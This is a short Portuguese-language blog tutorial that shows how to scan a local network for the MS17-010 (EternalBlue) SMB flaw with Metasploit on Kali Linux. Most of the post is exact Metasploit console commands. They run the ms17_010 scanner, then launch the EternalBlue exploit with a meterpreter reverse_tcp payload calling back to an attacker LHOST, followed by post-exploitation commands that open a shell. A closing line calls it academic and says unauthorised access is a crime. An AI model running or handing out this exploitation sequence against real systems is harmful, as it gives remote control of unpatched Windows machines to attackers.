Olá para darmos continuidade ao ano de 2020, hoje vou demostrar a varredura em sua Rede para detectar o eternalblue.
A premissa que vou considerar que você já tem em seu virtualbox é um kali linux atualizado
https://www.kali.org/downloads/
Comandos dentro do Kali Linux
# service postgresql start
# msfconsole
msf5 > search smb_ms17_010
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.0/24
msf5 auxiliary(scanner/smb/smb_ms17_010) > set THREADS 100
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
Quando a vulnerabilidade for identificada teremos a saida
"Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x86"
msf5 auxiliary(scanner/smb/smb_ms17_010) > back
msf5 > search ms17_010_eternalblue
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.0.2.15
msf5 exploit(windows/smb/ms17_010_eternalblue) > show missing
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
Pos invasão
sysinfo
getuid
shell
E por ai vai...
Lembrando que esse conteúdo serve apenas para fins acadêmicos, toda e qualquer acesso informático sem autorização É CRIME!!!
Junior
Posts do blog
- 2022 (4)
- 2021 (2)
- 2020 (7)
- 2019 (31)
- Novembro (1)
- Outubro (2)
- Setembro (3)
- Agosto (4)
- Julho (5)
- Junho (3)
- Abril (3)
- Março (4)
- Fevereiro (4)
- Janeiro (2)
- 2018 (21)
- Dezembro (3)
- Novembro (4)
- Outubro (2)
- Setembro (3)
- Julho (3)
- Junho (1)
- Maio (1)
- Abril (1)
- Março (1)
- Fevereiro (2)
- 2017 (29)
- Dezembro (1)
- Novembro (4)
- Outubro (2)
- Setembro (2)
- Agosto (1)
- Julho (6)
- Junho (3)
- Maio (1)
- Abril (1)
- Março (5)
- Fevereiro (1)
- Janeiro (2)
- 2016 (17)
- 2015 (7)
- 2014 (7)
- 2013 (24)
1 amigo
0 comunidades
Nenhum(a)